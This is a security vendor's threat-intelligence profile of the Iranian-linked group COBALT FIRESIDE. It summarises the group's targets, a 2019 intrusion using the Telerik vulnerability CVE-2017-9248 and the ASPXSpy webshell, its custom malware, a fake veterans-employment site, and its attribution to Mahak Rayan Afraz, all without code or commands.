COBALT FIRESIDE
Objectives
Aliases
Tools
SUMMARY
Since at least December 2017 COBALT FIRESIDE has targeted organizations in government, military, defence, aerospace and information technology sectors, with the notable concentrations in the United States and Saudi Arabia. COBALT FIRESIDE tradecraft has been reported in open source using the identifiers Tortoiseshell, TA456 and Imperial Kitten.
In a 2019 intrusion COBALT FIRESIDE exploited a Telerik vulnerability (CVE-2017-9248) to drop a variant of the ASPXSpy webshell and leveraged the resulting access to deploy FireBAK (aka SysKit). The group used PuTTY Link (plink.exe) and PsExec to move laterally and entrench their access. Procdump, downloaded from a compromised website, was used to dump the Local Security Authority Server Service (LSASS) process and save the results to ls.dmp, later renamed to ls.log.
CTU research connected this activity to the Hire Military Heroes campaign that COBALT FIRESIDE was conducting in parallel based on a shared C2 address. This campaign used a fake veterans employment support website, mimicking a legitimate organization, to distribute malware.
COBALT FIRESIDE uses custom malware including FireBAK (aka SysKit), LiderBird (aka Liderc) and LEMPO alongside publicly available tools to conduct its intrusions. In July 2021 Facebook disrupted around 200 accounts linked to COBALT FIRESIDE activity. The reporting describes extensive use of multiple social media and messaging platforms to engage targets, build rapport and deliver malicious payloads. The group also uses phishing operations with domains created that spoof media, technology, webmail, short link services, cloud services and niche entertainment products.
CTU researchers have linked malware samples used by COBALT FIRESIDE to the Iranian company Mahak Rayan Afraz (MRA). Facebook publicly linked Mahak Rayan Afraz (MRA) to Tortoiseshell activity in July 2021.
Contact Us
Contact us directly whether your organization needs immediate assistance or you want to discuss your incident readiness, response, and testing needs.